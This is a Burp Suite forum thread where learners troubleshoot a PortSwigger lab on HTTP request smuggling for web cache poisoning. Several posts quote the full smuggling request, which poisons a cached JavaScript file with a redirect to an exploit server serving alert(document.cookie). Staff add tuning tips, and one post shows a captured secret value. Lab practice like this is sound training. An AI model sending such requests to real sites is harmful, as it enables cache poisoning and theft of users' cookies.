Burp Suite User Forum

Login to post

Lab Not Working Properly

Nikhil | Last updated: Jul 08, 2020 03:22PM UTC

I am trying to solve this lab(Exploiting HTTP request smuggling to perform web cache poisoning) But seems it is not working properly i tried as per video solution by Micheal sommer. Request:- POST / HTTP/1.1 Host: ac821ff91fa6a6ac80911ed1005d00ec.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 185 Transfer-Encoding: chunked 0 GET /post/next?postId=3 HTTP/1.1 Host: aca71f681fe0a61c80c01e0d01930066.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1 GET /resources/js/tracking.js HTTP/1.1 Host: ac821ff91fa6a6ac80911ed1005d00ec.web-security-academy.net Connection: close I am trying to solve it since tommorow. I am facing these kind of issues with the following labs:- 1.Lab: Web cache poisoning to exploit a DOM vulnerability via a cache with strict cacheability criteria 2.Exploiting HTTP request smuggling to perform web cache poisoning 3.Exploiting HTTP request smuggling to capture other users' requests I already wrote about my problems . and i tried video solution too on these lab.

Nikhil | Last updated: Jul 09, 2020 03:26AM UTC

secret=HulgmvDOrl4k4MBiIhXVaktHzetPTsFZ Now i am getting the cookie but the lab is not solving

Hannah, PortSwigger Agent | Last updated: Jul 09, 2020 01:52PM UTC

I can confirm that this lab is working as expected.

Salil | Last updated: Oct 02, 2020 06:50PM UTC

the burp is not working, because while submitting xss payload in lab 2 of xss, the burp is not showing any request.

Hannah, PortSwigger Agent | Last updated: Oct 05, 2020 07:11AM UTC

Hi. Have you set up Burp correctly? You can find our documentation here: https://portswigger.net/burp/documentation/desktop

Pawel | Last updated: Jan 13, 2021 09:40PM UTC

I have the same issue. I have been trying to solve it from 3 days. Still the same issue I have. Is anyone how made it? I see in browser the XSS (1) - (the document.cookie does not work even in Chrome) but LAB is not solved. :(

Hannah, PortSwigger Agent | Last updated: Jan 14, 2021 09:17AM UTC

I can confirm the lab is working as expected. You may need to repeat the POST/GET process several times before the attack succeeds.

Pavlina | Last updated: Jan 16, 2021 08:36AM UTC

Same issue. Even if POST/GET request is processed several times.

Hannah, PortSwigger Agent | Last updated: Jan 18, 2021 11:09AM UTC

If you're still unable to complete the lab, you could try disabling all extensions and then retry the lab - sometimes they can have conflicting options.

Lieven | Last updated: Aug 08, 2021 05:49PM UTC

Hannah, for my sanity, is this lab still working as expected? I too have tried the community solution (after being unable to use the normal solution). This is the request I'm trying in repeater (I tried +500 variations at the time of writing but this is the one that should be working according to the solutions) --------------------------------------------------------------------- POST / HTTP/1.1 Host: acaf1f911ef7cfe6801f0c0400ef00b5.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 185 Transfer-Encoding: chunked 0 GET /post/next?postId=3 HTTP/1.1 Host: exploit-ace11f511e3acff980030cc4010500fe.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1 GET /resources/js/tracking.js HTTP/1.1 Host: acaf1f911ef7cfe6801f0c0400ef00b5.web-security-academy.net Connection: close --------------------------------------------------------------------- My observations - If I follow the redirect, it takes me to the alert(document.cookie) page from the exploit server - I can see the "victim" trying the POST request in the logging of the exploit server: 72.31.30.207 2021-08-08 17:39:43 +0000 "GET /post?postId=4 HTTP/1.1" 200 "User-Agent: Chrome/739298" - I get spurious 400 Bad Requests back ({"error":"Invalid request"}). I assume this is my actual problem but I'm at a loss on how to resolve it. Regards, Lieven

Lieven | Last updated: Aug 08, 2021 06:26PM UTC

Never mind, solved but still at a loss why it suddenly works, nothing is changed. Frustrating not understanding why :(

Anubhav | Last updated: Aug 21, 2021 03:57AM UTC

I have tried many times to solve this lab but at first I got 200 from response then 302 and at last 400 and this process continues. When I am going to reload the web page of the lab it redirect me to exploit server page and shows "alert(document.cookie)".

Kairos | Last updated: Sep 08, 2021 05:59PM UTC

I'm having the same issue. This is my code: POST / HTTP/1.1 Host: ac7a1f911ef7995e80d3ec5300020083.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 314 Transfer-Encoding: chunked 0 GET /post/next?postId=3 HTTP/1.1 Host: exploit-acab1f4f1e8899f38092ec9101ef005c.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1 GET /resources/js/tracking.js HTTP/1.1 Host: ac7a1f911ef7995e80d3ec5300020083.web-security-academy.net Connection: close The only thing I get after trying a lot of times is the "alert(document.cookie)" message on the lab page. Any idea?

Kairos | Last updated: Sep 08, 2021 06:01PM UTC

Sorry Content-Length: 185

Viren | Last updated: Sep 12, 2021 12:53PM UTC

Someone Please tell me whether 185 should do it thereby keeping in mind that I remove the word "exploit-" before appending it to the host or keep it and just change Content-Length: 193 instead

Hannah, PortSwigger Agent | Last updated: Sep 14, 2021 04:31PM UTC

Hi We've tested this lab, and while it is difficult to solve (due to the Expert level difficulty), it is functioning as intended and is solvable. You should not be removing the "exploit-" part from your exploit server URL, and you will need to adjust the content-length header to take into account the length of the exploit server URL.

You need to Log in to post a reply. Or register here, for free.